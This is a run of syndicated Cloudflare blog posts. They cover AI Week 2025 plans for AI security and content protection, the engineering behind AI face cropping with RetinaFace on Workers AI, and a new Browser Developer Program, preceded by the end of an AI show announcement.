Episode 3: Thinking — Hosting a live trivia stream online, Yorick begins confidently spouting answers that aren’t quite true. We head to New York City to meet someone whose life was saved by ChatGPT.

Episode 4: Learning — Yorick discovers generative AI and decides he can make the show himself, spawning multiple Craig clones and raising questions about ethics and creativity.

Episode 5: Doing — It turns out everyone we talk to just wants a robot to do their dishes. We dig into what “doing” means in AI and robotics and whether Yorick is on board.

Episode 6: Smell — In our finale, we explore the agentic AI future, quantum computing, and big sci-fi dreams, then hang out with a 9-year-old vibe coder because, well, the children are the future.

Get hands-on

Every episode is paired with developer tutorials so you can experiment with the same AI tools that we feature. No matter your skill level, you can tinker, build, and see for yourself what AI can do. We strongly believe the most important thing you can do right now is to touch AI, play with it. Now is the time.

Follow along the avenue

Yorick and I will be releasing each episode of AI Avenue as it’s ready, and we’d love to have you along for the ride.

Sign up to be notified when new episodes launch and explore more about the show at aiavenue.show.


Welcome to AI Week 2025

Post Syndicated from Kenny Johnson original https://blog.cloudflare.com/welcome-to-ai-week-2025/

We are witnessing in real time as AI fundamentally changes how people work across every industry. Customer support agents can respond to ten times the tickets. Software engineers are reviewers of AI generated code instead of spending hours pounding out boiler plate code. Salespeople can get back to focusing on building relationships instead of tedious follow up and administration. 

This technology feels magical, and Cloudflare is committed to helping companies build world class AI-driven experiences for their employees and customers.

There is a but, however. Any time a brand new technology with such widespread appeal emerges, the technology often outpaces the tools in place to govern, secure and control the technology. We’re already starting to see stories of vibe coded apps leaking all their users’ details. LLM chats that were intended to only be shared between colleagues, are actually out on the web, being indexed by search engines for all the world to see. AI Agents are being given the keys to the application kingdom, enabling them to work autonomously across an organization — but without proper tracking and control. And then there’s the risk of a well-meaning employee uploading confidential company or customer data into an LLM, which then uses it to train future models.

Beyond internal data used for LLM training, content creators and media companies are also faced with a decision about how they want LLM scrapers and information retrieval bots to interact with their content. Cloudflare has found that it can be hundreds, or even thousands, of times harder to generate site traffic (and therefore ad revenue) from an AI response versus a search engine result.

We’re hearing more and more of these stories from CISOs, CIOs, Creators, and even CEOs. These leaders are faced with a difficult choice: clamping down on all AI usage and bots — or letting them run wild. There needs to be something in between. And for that to be a real option, the tools to manage and secure AI need to catch up to AI itself.

This week, that’s what Cloudflare is focused on. Welcome to AI Week! Over the coming week, we will focus on four core areas to help companies secure and deliver AI experiences safely and securely:

  • Securing AI environments and workflows: AI is incredibly powerful. The problem is, innovation is outpacing control — we want to change that. And as one of the few zero trust providers also building out AI infrastructure for the web, we’re uniquely positioned to be able to do so. 

  • Protecting original content from misuse by AI: AI Companies are devouring organic content as quickly as it’s created… and creators aren’t seeing any benefit. We want to give content creators control over the content that they have worked so hard to develop.

  • Helping developers build world-class, secure, AI experiences: the possibilities for developers to create new applications on top of (or even building with) AI are endless.  We want to allow developers to create AI driven applications that are as close to users as possible, with security controls built-in from day one.

  • Making Cloudflare better for you with AI: AI is changing the nature of interfaces. For example, finding and mitigating issues buried in thousands and millions of logs and events across website, employee, and email usage is something that used to be tedious — but now with AI, it can be made easy. We’re working day and night to integrate AI into Cloudflare itself to make things more efficient for ourselves and our customers.

Securing AI environments and workflows

As Artificial Intelligence innovation continues to accelerate at an unprecedented pace, the speed of its development is increasingly outpacing the implementation of robust security controls. This rapid advancement, while promising immense benefits, simultaneously introduces novel and complex security challenges that traditional measures are often ill-equipped to address. Organizations are finding themselves grappling with the inherent risks of adopting powerful AI tools without adequate safeguards, leading to vulnerabilities such as Shadow AI and the uncontrolled proliferation of AI models, making the development of specialized AI security paramount.

As we look around the zero trust space, none of the other providers are moving fast enough to keep up with AI’s pace of innovation. This is something we know a thing or two about — and after this week, if you’re worried about governing AI usage inside your organization, we will have you covered. 

We will be announcing new and powerful controls to detect Shadow AI and control unauthorized AI usage. Additionally, we’ve built options for teams to establish the “paved path” of AI tooling in an organization to supercharge employee productivity without sacrificing security. Finally, we’ll be announcing new ways of protecting your own models from poisoning or attacks.


Protecting original content from AI

The explosion of Large Language Models (LLMs) has also created a new challenge for content creators: the unauthorized scraping and training of their valuable content. Cloudflare recognizes the critical need for creators to maintain control over their intellectual property. That’s why we’ve introduced Crawl Control, a groundbreaking initiative designed to empower content owners to manage how their content is accessed and used by AI models.

In the past two months, we’ve seen incredible progress with Crawl Control. We’ve significantly expanded the number of participating content providers, allowing more creators to leverage this innovative protection. We’ve also refined our detection mechanisms to more accurately identify AI crawlers and ensure that only authorized access occurs. Furthermore, we’ve streamlined the integration process, making it easier for new publishers to onboard and begin protecting their content within minutes. Our goal remains to provide content creators with the tools they need to thrive in the age of AI, ensuring they are compensated and acknowledged for the content they produce.


Helping you build world-class, secure, AI experiences

We believe that AI experiences should have security controls by default. This is why we are heavily investing in both our developer platform’s AI Gateway and the associated security controls for those products. This two pronged approach allows developers to iterate and test new ideas without the fear of painful or embarrassing security issues.

The Cloudflare AI Gateway allows developers to deploy AI-driven applications with unparalleled speed and efficiency, ensuring that these applications are as close to end-users as possible. This proximity minimizes latency and maximizes performance, delivering a seamless and responsive user experience that is critical in today’s fast-paced digital landscape.

This week, we’re announcing significant enhancements to the AI Gateway, further solidifying its position as the premier platform for AI application deployment. These improvements include advanced caching mechanisms that reduce redundant model calls, leading to faster response times and lower operational costs. We are also introducing expanded observability features, providing developers with deeper insights into their AI model’s performance and usage patterns, which will enable more effective debugging and optimization. Furthermore, new integrations with popular AI frameworks and services will simplify the development workflow, allowing developers to leverage the AI Gateway’s benefits with even greater ease. Our commitment is to provide developers with the tools to innovate and deliver cutting-edge AI experiences to their users.

Making Cloudflare better with AI 

We’re integrating AI across our entire product suite to enhance the Cloudflare experience itself. From intelligent threat detection that adapts to emerging attack patterns, to AI-powered optimizations that fine-tune network performance, our goal is to leverage AI to make our platform more intuitive, efficient, and secure. We envision a future where Cloudflare’s products proactively anticipate user needs, automate complex tasks, and deliver unparalleled insights, all powered by seamlessly embedded AI. This commitment to internal AI integration ensures that as the digital landscape evolves, Cloudflare remains at the forefront of innovation, continuously delivering superior value to our users.

We cannot wait to share these updates and announcements with you. Follow our AI Week hub page for all the latest releases from our blog and CloudflareTV.


How we built AI face cropping for Images

Post Syndicated from Deanna Lam original https://blog.cloudflare.com/ai-face-cropping-for-images/

During Developer Week 2024, we introduced AI face cropping in private beta. This feature automatically crops images around detected faces, and marks the first release in our upcoming suite of AI image manipulation capabilities.

AI face cropping is now available in Images for everyone. To bring this feature to general availability, we moved our CPU-based prototype to a GPU-based implementation in Workers AI, enabling us to address a number of technical challenges, including memory leaks that could hamper large-scale use.


Photograph by Suad Kamardeen (@suadkamardeen) on Unsplash

Turning raw images into production-ready assets

We developed face cropping with two particular use cases in mind:

Social media platforms and AI chatbots. We observed a lot of traffic from customers who use Images to turn unedited images of people into smaller profile pictures in neat, fixed shapes.

E-commerce platforms. The same product photo might appear in a grid of thumbnails on a gallery page, then again on an individual product page with a larger view. The following example illustrates how cropping can change the emphasis from the model’s shirt to their sunglasses.


Photograph by Media Modifier (@mediamodifier) on Unsplash

When handling high volumes of media content, preparing images for production can be tedious. With Images, you don’t need to manually generate and store multiple versions of the same image. Instead, we serve copies of each image, each optimized to your specifications, while you continue to store only the original image.

Crop everything, everywhere, all at once

Cloudflare provides a library of parameters to manipulate how an image is served to the end user. For example, you can crop an image to a square by setting its width and height dimensions to 100×100.

By default, images are cropped toward the center coordinates of the original image. The gravity parameter can affect how an image gets cropped by changing its focal point. You can specify coordinates to use as the focal point of an image or allow Cloudflare to automatically determine a new focal point.


The gravity parameter is useful when cropping images with off-centered subjects. Photograph by Andrew Small (@andsmall) on Unsplash

The gravity=auto option uses a saliency algorithm to pick the most optimal focal point of an image. Saliency detection identifies the parts of an image that are most visually important; the cropping operation is then applied toward this region of interest. Our algorithm analyzes images using visual cues such as color, luminance, and texture, but doesn’t consider context within an image. While this setting works well on images with inanimate objects like plants and skyscrapers, it doesn’t reliably account for subjects as contextually meaningful as people’s faces.

And yet, images of people comprise the majority of bandwidth usage for many applications, such as an AI chatbot platform that uses Images to serve over 45 million unique transformations each month. This presented an opportunity for us to improve how developers can optimize images of people.

AI face cropping can be performed by using the gravity=face option, which automatically detects which pixels represent the face (or faces) and uses this information to crop the image. You can also affect how closely the image is cropped toward the face; the zoom parameter controls the threshold for how much of the surrounding area around the face will be included in the image.

We carefully designed our model pipeline with privacy and confidentiality top of mind. This feature doesn’t support facial identification or recognition. In other words, when you optimize with Cloudflare, we’ll never know that two different images depict the same person, or identify the specific people in a given image. Instead, AI face cropping with Images is intentionally limited to face detection, or identifying the pixels that represent a human face.

From pixels to people

Our first step was to select an open-source model that met our requirements. Behind the scenes, our AI face cropping uses RetinaFace, a convolutional neural network model that classifies images with human faces.

A neural network is a type of machine learning process that loosely resembles how the human brain works. A basic neural network has three parts: an input layer, one or more hidden layers, and an output layer. Nodes in each layer form an interconnected network to transmit and process data, where each input node is connected to nodes in the next layer.


A fully connected layer passes data from one layer to the next.

Data enters through the input layer, where it is analyzed before being passed to the first hidden layer. All of the computation is done in the hidden layers, where a result is eventually delivered through the output layer.

A convolutional neural network (CNN) mirrors how humans look at things. When we look at other people, we start with abstract features, like the outline of their body, before we process specific features, like the color of their eyes or the shape of their lips.

Similarly, a CNN processes an image piece-by-piece before delivering the final result. Earlier layers look for abstract features like edges and colors and lines; subsequent layers become more complex and are each responsible for identifying the various features that comprise a human face. The last fully connected layer combines all categorized features to produce one final classification of the entire image. In other words, if an image contains all of the individual features that define a human face (e.g. eyes, nose), then the CNN concludes that the image contains a human face.

We needed a model that could determine whether an image depicts a person (image classification), as well as exactly where they are in the image (object detection). When selecting a model, some factors we considered were:

  • Performance on the WIDERFACE dataset. This is the state-of-the-art face detection benchmark dataset, which contains 32,203 images of 393,703 labeled faces with a high degree of variability in scale, pose, and occlusion.

  • Speed (in frames per second). Most of our image optimization requests occur on delivery (rather than before an image gets uploaded to storage), so we prioritized performance for end-user delivery.

  • Model size. Smaller model sizes run more efficiently.

  • Quality. The performance boost from smaller models often gets traded for the quality—the key is balancing speed with results.

Our initial test sample contained 500 images with varying factors like the number of faces in the image, face size, lighting, sharpness, and angle. We tested various models, including BlazeFast, R-CNN (and its successors Fast R-CNN and Faster R-CNN), RetinaFace, and YOLO (You Only Look Once).

Two-stage detectors like BlazeFast and R-CNN propose potential object locations in an image, then identify objects in those regions of interest. One-stage detectors like RetinaFace and YOLO predict object locations and classes in a single pass. In our research, we observed that two-stage detector methods provided higher accuracy, but performed too slowly to be practical for real traffic. On the other hand, one-stage detector methods were efficient and performant while still highly accurate.

Ultimately, we selected RetinaFace, which showed the highest precision of 99.4% and performed faster than other models with comparable values. We found that RetinaFace delivered strong results even with images containing multiple blurry faces:


Photograph by Anne Nygård (@polarmermaid) on Unsplash

Inference—the process of using training models to make decisions—can be computationally demanding, especially with very large images. To maintain efficiency, we set a maximum size limit of 1024×1024 pixels when sending images to the model.

We pass images within these dimensions directly to the model for analysis. But if either width or height dimension exceeds 1024 pixels, then we instead create an inference image to send to the model; this is a smaller copy that retains the same aspect ratio as the original image and does not exceed 1024 pixels in either dimension. For example, a 125×2000 image will be downscaled to 64×1024. Creating this resized, temporary version reduces the amount of data that the model needs to analyze, enabling faster processing.

The model draws all of the bounding boxes, or the regions within an image that define the detected faces. From there, we construct a new, outer bounding box that encompasses all of the individual boxes, calculating its top-left and bottom-right points based on the boxes that are closest to the top, left, bottom, and right edges of the image.

The top-left point uses the x coordinate from the left-most box and the y coordinate from the top-most box. Similarly, the bottom-right point uses the x coordinate from the right-most box and the y coordinate from the bottom-most box. These coordinates can be taken from the same bounding boxes; if a single box is closest to both the top and left edges, then we would use its top-left corner as the top-left point of the outer bounding box.


AI face cropping identifies regions that represent faces, then determines an outer bounding box and focal point based on the top-most, left-most, right-most, and bottom-most bounding boxes.

Once we define the outer bounding box, we use its center coordinates as the focal point when cropping the image. From our experiments, we found that this produced better and more balanced results for images with multiple faces compared to other methods, like establishing the new focal point around the largest detected face.

The cropped image area is calculated based on the dimensions of the outer bounding box (“d”) and a specified zoom level (“z”) in the formula (1 ÷ z) × d. The zoom parameter accepts floating points between 0 and 1, where we crop the image to the bounding box when zoom=1 and include more of the area around the box as zoom trends toward 0.

Consider an original image that is 2048×2048. First, we create an inference image that is 1024×1024 to meet our size limits for face detection. Second, we define the outer bounding box using the model’s predictions—we’ll use 100×500 for this example. At zoom=0.5, our formula generates a crop area that is twice as large as the bounding box, with new width (“w”) and height (“h”) dimensions of 200×1000:


We also apply a min function that chooses the smaller number between the input dimensions and the calculated dimensions, ensuring that the new width and height never exceed the dimensions of the image itself. In other words, if you try to zoom out too much, then we use the full width or height of the image instead of defining a crop area that will extend beyond the edge of the image. For example, at zoom=0.25, our formula yields an initial crop area of 400×2000. Here, since the calculated height (2000) is larger than the input height (1024), we use the input height to set the crop area to 400×1024.

Finally, we need to scale the crop area back to the size of the original image. This applies only when a smaller inference image is created.

We initially downscaled the original 2048×2048 image by a factor of 2 to create the 1024×1024 inference image. This means that we need to multiply the dimensions of the crop area—400×1024 in our latest example—by 2 to produce our final result: a cropped image that is 800×2048.

The architecture behind the earliest build

In the beta version, we rewrote the model using TensorFlow Rust to make it compatible with our existing Rust-based stack. All of the computations for inference—where the model classifies and locates human faces—were executed on CPUs within our network.

Initially, this worked well and we saw near-realtime results.

However, the underlying limitations of our implementation became apparent when we started receiving consistent alerts that our underlying Images service was nearing its limits for memory usage. The increased memory usage didn’t line up with any recent deployments around this time, but a hunch led us to discover that the face cropping compute time graph had an uptick that matched the uptick in memory usage. Further tracing confirmed that AI face cropping was at the root of the problem.

When a service runs out of memory, it terminates its processes to free up memory and prevent the system from crashing. Since CPU-based implementations share RAM with other processes, this can potentially cause errors for other image optimization operations. In response, we switched our memory allocator from glibc malloc to jemalloc. This allowed us to use less memory at runtime, saving about 20 TiB of RAM globally. We also started culling the number of face cropping requests to limit CPU usage.

At this point, AI face cropping was already limited to our own internal uses and a small number of beta customers. These steps only temporarily reduced our memory consumption. They weren’t sufficient for handling global traffic, so we looked toward a more scalable design for long-term use.

Doing more with less (memory)

With memory usage alerts looming in the distance, it became clear that we needed to move to a GPU-based approach.

Unlike with CPUs, a GPU-based implementation avoids contention with other processes because memory access is typically dedicated and managed more tightly. We partnered with the Workers AI team, who created a framework for internal teams to integrate payloads into their model catalog for GPU access.

Some Workers AI models have their own standalone containers; this isn’t practical for every model, as routing traffic to multiple containers can be expensive. When using a GPU through Workers AI, the data needs to travel over the network, which can introduce latency. This is where model size is especially relevant, as network transport overhead becomes more noticeable with larger models.

To address this, Workers AI wraps smaller models in a single container and utilizes a latency-sensitive routing algorithm to identify the best instance to serve each payload. This means that models can be offloaded when there is no traffic.


A scheduler is used to optimize how—and when—models in the same container interact with GPUs.

RetinaFace runs on 1 GB of VRAM on the smallest GPU; it’s small enough that it can be hot swapped at runtime alongside similarly sized models. If there is a call for the RetinaFace model, then the Python code will be loaded into the environment and executed.

As expected, we saw a significant drop in memory usage after we moved the feature to Workers AI. Now, each instance of our Images service consumes about 150 MiB of memory.


With this new approach, memory leaks pose less concern to the overall availability of our service. Workers AI executes models within containers, so they can be terminated and restarted as needed without impacting other processes. Since face cropping runs separately from our Images service, restarting it won’t halt our other image optimization operations.

Applying AI face cropping to our blog

As part of our beta launch, we updated the Cloudflare blog to apply AI face cropping on author images.

Authors can submit their own images, which appear as circular profile pictures in both the main blog feed and individual blog posts. By default, CSS centers images within their containers, making off-centered head positions more obvious. When two profile pictures include different amounts of negative space, this can also lead to a visual imbalance where authors’ faces appear at different scales:


AI face cropping makes posts with multiple authors appear more balanced.

In the example above, Austin’s original image is cropped tightly around his face. On the other hand, Taylor’s original image includes his torso and a larger margin of the background. As a result, Austin’s face appears larger and closer to the center than Taylor’s does. After we applied AI face cropping to profile pictures on the blog, their faces appear more similar in size, creating more balance and cohesion on their co-authored post.

A new era of image editing, now in Images

Many developers already use Images to build scalable media pipelines. Our goal is to accelerate image workflows by automating rote, manual tasks.

For the Images team, this is only the beginning. We plan to release new AI capabilities, including features like background removal and generative upscale. You can try AI face cropping for free by enabling transformations in the Images dashboard.

Announcing the Cloudflare Browser Developer Program

Post Syndicated from Sally Lee original https://blog.cloudflare.com/announcing-the-cloudflare-browser-developer-program/

Today, we are announcing Cloudflare’s Browser Developer Program, a collaborative initiative to strengthen partnership between Cloudflare and browser development teams.

Browser developers can apply to join here

At Cloudflare, we aim to help build a better Internet. One way we achieve this is by providing website owners with the tools to detect and block unwanted traffic from bots through Cloudflare Challenges or Turnstile. As both bots and our detection systems become more sophisticated, the security checks required to validate human traffic become more complicated. While we aim to strike the right balance, we recognize these security measures can sometimes cause issues for legitimate browsers and their users.

Building a better web together

A core objective of the program is to provide a space for intentional collaboration where we can work directly with browser developers to ensure that both accessibility and security can co-exist. We aim to support the evolving browser landscape, while upholding our responsibility to our customers to deliver the best security products. This program provides a dedicated channel for browser teams to share feedback, report issues, and help ensure that Cloudflare’s Challenges and Turnstile work seamlessly with all browsers.

What the program includes

Browser developers in the program will benefit from:

  • A two-way communication channel to Cloudflare’s team dedicated to addressing browser-specific concerns, feedback, and issues.

  • Best practices for building and testing against Cloudflare Challenges and Turnstile.

  • A private community forum for updates, questions, and discussion between browser developers and Cloudflare engineers. 

  • Early visibility into updates or changes to that may impact how your browser handles Cloudflare Challenges.

  • (If applicable) Testing integration where we will incorporate your browser into our testing pipeline and monitor its performance with our releases.

This program is designed as a partnership where Cloudflare will, with our best effort, ensure our security products work properly with all browsers, while giving browser developers a voice in how these systems evolve. As an output of this program, we expect to publish clear browser requirements to run Cloudflare Challenges while striking the balance between openness and security. 

For end users browsing the web, we continue to support a wide range of browsers. We will continue to update this list based on the insights and collaborations from the Browser Developer Program. We are also committed to ensuring our Challenge interstitial pages and Turnstile provide clear, actionable UI/UX for any error or failed states, making it easier for you to understand and resolve issues you may encounter. 

How to apply

If you are working on a browser and want to ensure your users have a seamless experience with Cloudflare-protected websites, we encourage you to apply here

We’ll ask for basic information about your project and ask you to sign our Browser Developer Program Agreement. In addition, we expect participants to adhere to our Community Code of Conduct and commit to constructive engagement.

Once you’re accepted, you’ll be invited to a private space in the Cloudflare Community where you can engage directly with our team. 

Why is this important?

Cloudflare Challenges, a security mechanism to verify whether a visitor is a human or a bot, serve a wide variety of browsers in the world today. Chrome leads with 68.0%, Safari at 8.7%, Firefox at 6.3%, Edge at 4.8%, and Opera at 6.2%. However, the very long tail of browsers that collectively make up the remaining traffic, each representing less than 1% individually but together painting a picture of an incredibly diverse web ecosystem.


Browser traffic distribution, with 100+ browsers comprising the ‘Other’ category

This diversity spans a wide range of environments, each with unique constraints and capabilities:

  • Emerging and experimental browsers pushing the boundaries of web technology

  • Privacy-focused browsers such as DuckDuckGo that prioritize user data protection

  • Embedded browsers inside social media apps like Facebook, Instagram, and TikTok

  • WebViews used by mobile applications

  • Gaming and VR browsers such as Oculus for headsets and gaming consoles

  • Smart device browsers built into classroom displays and home appliances

Supporting this level of diversity poses real engineering challenges. Many of these browsers deviate from standard assumptions. Some lack full support for modern Web APIs, others operate under more stringent data privacy policies, and some are optimized for environments where our script to verify visitors may be hindered or blocked from running properly. These browsers are not bad or malicious. But their behavior may fall outside the typical patterns observed in mainstream browsers, which can lead to problematic or failed Challenge flows which we would like to avoid.

From an engineering perspective, our job is to strike a difficult balance. If our logic is too rigid that it expects only the behaviors of the majority, we risk excluding legitimate users on less conventional platforms. But if we relax our standards too much, we increase the attack surface for abuse. We cannot overfit to the top 5 browsers, nor can we afford to treat all clients as equal in capability or trustworthiness.

The Browser Developer Program is one way to close this gap. By working directly with browser teams, especially those building for niche or emerging environments, we can better understand the constraints they operate under and collaborate to make each of our systems more compatible and resilient. 

Join us!

This program is free to join, and is open to any browser developer, no matter the size or the lifecycle stage. Our goal is to listen, learn, and collaborate with browser developers to create a better experience for everyone. 

We believe this program will ultimately benefit end users the most. By joining this program, you will help us build solutions that prioritize both the security needs of businesses as well as the diverse ways people access the Internet. 

We look forward to your participation!